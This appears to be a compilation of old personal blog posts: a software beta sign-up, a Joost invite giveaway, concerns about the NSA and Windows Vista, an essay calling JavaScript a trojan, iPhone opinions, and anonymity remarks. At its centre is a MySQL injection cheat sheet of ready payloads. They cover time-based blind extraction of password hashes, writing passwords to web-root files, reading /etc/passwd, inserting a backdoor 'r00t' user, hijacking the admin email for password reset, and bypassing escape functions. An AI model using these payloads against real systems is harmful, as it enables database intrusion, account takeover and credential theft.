I was recently introduced to MyMint financial software, that is currently seeking individuals interested in their beta version. Personally, I’m not a big fan of financial managers because I haven’t really found one that suits me well. My financial situation is crazy and I rarely have time to log all my recent transactions into an insecure piece of software. However, I am really intrigued by this new MyMint concept, not to be confused with Mint web statistics by Shaun Inman.

When you sign up for beta access you’re asked to complete a survey, if you would be interested in receiving an invitation to their beta program faster than normal, I guess. Done! I am talking about your software and I haven’t even seen it. However, I know this is just a method to get free publicity and it works.

That is the image they asked me to post so I did. Now you see it, in a week or so if I don’t have an invitation, maybe you won’t. Not sure, depends on my mood. But I am really interested in checking out their software, pen-testing the shit out of it and hopefully breaking something.. if they invite me.

If you’re already using it, tell me how it is!!

Okay, so maybe I don’t have your Joost, but I definitely have someone’s joost! A good pal of mine David expressed his want for a Joost streaming television invitation the other day, and I thought I would go ahead and mention that I have some tokens available to give out. I’m going to have to do something nifty to give them out though…

If you want to “go into the hat” for a Joost invitation, simply comment on this thread, populating all of the form elements or write on your website about a Joost invitation and send a trackback this direction. I guess, if you link to me on your website I’ll throw you in the hat too but you’ll still have to comment. I could definitely use the link traffic :)

Either way, joost invitations are up for grabs!! I’m going to be giving two away this week, so… get em while they’re.. still mine to give away?

MySQL Injection Cheat Sheet

Basics.

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Variations.

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;

Blind injection vectors.

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost

Using the timeout to check if user exists

SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!

Gathering info

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))

Note: You must specify a new file, it may not exist! and give the correct
pathname!

The CHAR() quoteless function

SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

example:

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login

explaining: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’

A quoteless example:

SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Possible chars: 0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122

Misc

Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions

(MySQL 4.1.x before 4.1.20 and 5.0.x)

Bypassing addslashes() with GBK encoding

WHERE x = 0xbf27admin 0xbf27

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string"
に関する追加情報：

the above chars are Chinese Big5

Advanced Vectors

Using an HEX encoded query to bypass escaping.

Normal:

SELECT * FROM login WHERE user = 'root'

Bypass:

SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal:

insert into login set user = ‘root’, pass = ‘root’

Bypass:

insert into login set user = 0×726F6F74, pass = 0×726F6F74

How to determin the HEX value for injection.

SELECT HEX('root');

gives you:

726F6F74

then add:

0x

before it.

As a government security agency, what company would capture your interest the most in terms of eavesdropping on the most potential threats? Microsoft currently carries more than 90 percent of the market for its operating system Windows, which the NSA believes to be in its favor.

For Windows Vista Security, Microsoft Calls in the Pros was published late last week on the Washington Post and honestly, I am a bit uneasy about the entire call Microsoft made to the NSA.

Why am I uneasy about this? A company that produces software for 600 million users is currently unable to provide security itself, therefore they are recruiting the assistance of a well-known government security agency. If they can’t secure their operating system themselves, who says they’re protecting their users from the known habits of the NSA?

Who is going to keep the NSA from incorporating a rootkit, eavesdropping daemon, and the like? Granted the NSA is helping itself out because they utilize Microsoft products and services, however, on the same note; why would a company want to utilize such software that can’t be maintained by its vendor?

Evaluate this awful loop and take into mind these possibilities…

1. NSA developers and engineers are so smart; why not utilize an operating system developed soley for their needs? I understand not re-inventing the wheel, yet they are utilizing an operating system they’re securing and branding with their seal of approval per se.
2. Hypocrite? I believe so, the NSA is supposedly going to secure this operating system and label it as such. Therefore, aren’t they biting the bullet when it comes to eavesdropping and monitoring terrorists or threats utilizing such aforementioned NSA secured and approved operating system?
3. There has to be NSA planted back doors in it..

Call me paranoid, take me seriously; I’m being realistic! The United States NSA employs some of the smartest engineers, developers, scientists and mathematics minds on the planet. However, they are not operating system creators, thus, makes me curious who actually developed and built Echelon.

Sitting amongst us all, every moment of every day, rests a trojan that has been neglected for as long as I can recall. It quietly lay dormant waiting for the opportune moment to rise up and cause havoc across the globe. Over the last six years it rarely has shown its face to anyone; except those who poke and prod to prove its capability. However, with the rise of Web 2.0, the ugly head of this trojan turns and is gradually rising.

The horror I mention is dubbed, Javascript. The language in which internet users have come to admire and consider a mere toy to add a little extra pop or spice to their internet applications and websites. Our internet browsers rely on this language and there is no way to turn back from it now. Over the years the language has been accepted as a vital member of our internet community and is often worshiped. It receives large amounts of praise from its blood brother: Ajax.

The true nature of these languages are beginning to write tales of horror as they begin to become obvious. We have allowed these languages to penetrate our computers, laughing at our ignorance for allowing a stateless protocol infect us with it; HTTP.

Netscape Communications Corporation’s implementation of the ECMAScript standard was named Javascript, based on the concept of prototype-based scripting languages. The language is best known and witnessed for its implementation within websites, known as client-side Javascript, designed primarily by Brendan Eich, however, also enabling scripting access to objects embedded within other applications. Javascript is designed to execute arbitrary server provided code on a client computer. It has been given permission to bypass many barriers and execute nearly anything imagineable on a client.

Content creation should not be recondite. It should not be this bizarre arcana that only experts and gold-plated computer science gurus can do.

Brendan Eich, Innovators of the Net, primary designer of JavaScript.

May I say wrong? Absolutely! Personally, I completely disagree with Brendan’s statement, a programming language should be simplified, thereby its security follows suit. The so-called experts knew of the dangers long before and are now witnessing as users fall in the realm of insecure applications. We are now utilizing cross-site scripting and javascript shells which are slowly taking over our computers. No lessons learned and all bullshit aside; security’s biggest nemesis is the usability of it. A secure system is extremely difficult to manage, there is a good reason for it; security deals with a large amount of complexity and obscurity which cannot be put into practice with simplicity in mind. It simply implies, to secure your computer, integrate with a firewall to control access.

Getting through the city gates

Imagine for a moment, a language in which was permitted to freely travel through the gates of your computer; travel without question through your firewall. What if someone developed such a language in C, would we have any objections? Obviously not, it was created and we know it as Javascript. Javascript is permitted to travel through the firewall and executed on your local computer by all internet browsers. It is allowed to execute and send data back to remote servers through the HTTP protocol stream. Ajax is the new trojan, in plain view and very strong. Java, the virtual machine, acts as a sandbox for code to be executed, however, Javascript has none. Javascript is allowed to pass through because of our permissions. Ajax isn’t less secure than Javascript, it relies on Javascript.

Javascript is not a toy, respect it..

Javascript has been treated as a toy language for years. Mistaking this language as nothing more than a quick enhancement to HTML for web pages. It was typically utilized to add popups, interactive functionality and even effects to boring sites. Most have ignored the power behind Javascript, most are still oblivious to its strength. With power comes responsibility and inherently exploiting and vulnerabilities is born. I feel as though Javascript is not a toy language and we should stray from these ideas and face the facts about the language. Cross-site scripting opened a whole new world for vulnerabilities. Giving malicious hackers backdoor access to your computer and honestly the opportunity to own your computer. Disabling Javascript could be a quick fix, however, most websites require Javascript to be enabled to enhance the viewing of their particular pages. Online banking systems, social networking, and web mail interfaces all utlize Javascript and who wants to miss the beloved pop-up windows?

Aftermath:

As the internet evolves, especially with Web 2.0 really taking off. A new generation of internet applications and enhancements are being made. These applications are going to take Javascript, especially Ajax to a new level. It will begin to flourish like we have never thought possible. Real-time content fetching, less browser refreshing; almost as if our clients are becoming more and more dependant upon remote servers. They’re beginning to grow closer and closer together, nearly attaching themselves to one another for operation. Until, at some point everything breaks, fails and falls to the conclusion thats Javascript is dangerous.

My prediction and conclusion..

I feel as though the situation cannot be avoided. We have attached ourselves, our browsers and our applications around the concepts provided from Javascript. It is a little too late to drop the beloved language in which our websites depend upon so much. The trojan is amongst us, breathing and evolving with our workstations, applications and community. We must embrace the trojan and live beside it, treat it with extreme care and occasionally provide a little dance to praise the wonderful features it adds.

Browser producers should develop new security techniques and implement technologies to provide a sort of sandbox for Javascript code to be executed within before it is allowed onto the local file system. It is up to our browser counter-parts to not allow Javascript to become the worst trojan we know. A sandbox, virtual machine would prevent Javascript from becoming a logical bomb, destroying all that we have built.

2007 will bring about the real aftermath. Personally, with Web 2.0 being as big as it is, I am going to sit back and watch the show. Hopefully there won’t be fireworks caused by harm but celebration for our new advances.

I recall measuring someone’s status quo by the size of their home, automobiles in the garage and the art hanging on their interior walls. However, my generation and the generation to follow are measuring the value or quo of their peers through the technology behind their mobile phones, music players and notebooks.

Since the announcement of iPhone, numerous friends and associates have contacted me to proclaim that their next mobile phone purchase is to be an iPhone. That’s great guys! I appreciate you informing me that you feel as though your personal value in life will be improved through your mobile phone. Kidding; really.

Personally, I think the phone is slightly over-hyped and is probably going to turn out to be a flop. Seriously, the screen is 3.5″ and is going to end up breaking. Remember the sony cell digital cameras that were so thin you could fit them into your pocket? Well, the large issue with people returning and being disgusted with that camera was the screen would crack or get broken when you hit something with your leg.

I feel as though this will be the same scenario with the iPhone.

I currently own a Samsung A900, as most of my friends, however, prior to their purchase of it for reasons of coolness or the like, I purchased the phone because I wanted to be able to tether via bluetooth to my Macbook. I was using a iBook G4 at the time, however, now with my MacBook the process is identical. The phones music, photo and mass storage options are rarely used. Its the internet, EV-DO package through Sprint I was concerned with.

I can’t imagine having a single device for music etc, battery life just isn’t there and I don’t think there will be any dramatic improvements over existing battery technology any time soon. Multiple batteries, different sized batteries and the like are the only improvement that could be made.

If you’re going to purchase a iPhone, let me know, especially give me some feedback once you get your hands on one. I’m curious how many other cellular providers will pick the device up by June, which is when Cingular and Apple plan to launch the device.

“My notebook brings all the girls to the yard, they’re like you got memory cards? Darn right, I got sd cards, 150x, 4GB, the best woman, now step off me before I stab you with a blunt object like my ipod!”

The end!

The last week, including the weekend has been extremely busy, however, the internet, community driven and powerful has not taken such a break.  Over the past week a great deal of accomplishments have been made that I feel are worth mentioning.  For those who pay attention, this will come as no suprise, yet I know there are many of you that have no clue — so pay attention!

Over the past six years of my life, I have devoted a great amount of time to web development and design.  I have been doing freelance webdesign for quite some time and although I am typically unable to do anything for my personal projects that I find pleasing, I usually always come up with something to impress everyone else.

In an effort to broaden your knowledge regarding anonymity on the internet. I feel compelled to share my opinions on the recent hype of Untraceable, Recordless and Anonymous electronic mail. It seems as though numerous service providers have attempted to create such an useful service, however, most give up; fail.

If you were to visit google and search terms associated with anonymous web surfing, tens of thousands of related websites will appear as a result. Most of these results are sites established for the sole purpose of creating an environment to persuade or trick users into clicking advertisements. Finding an actual service or resource for true anonymous web surfing is sometimes difficult.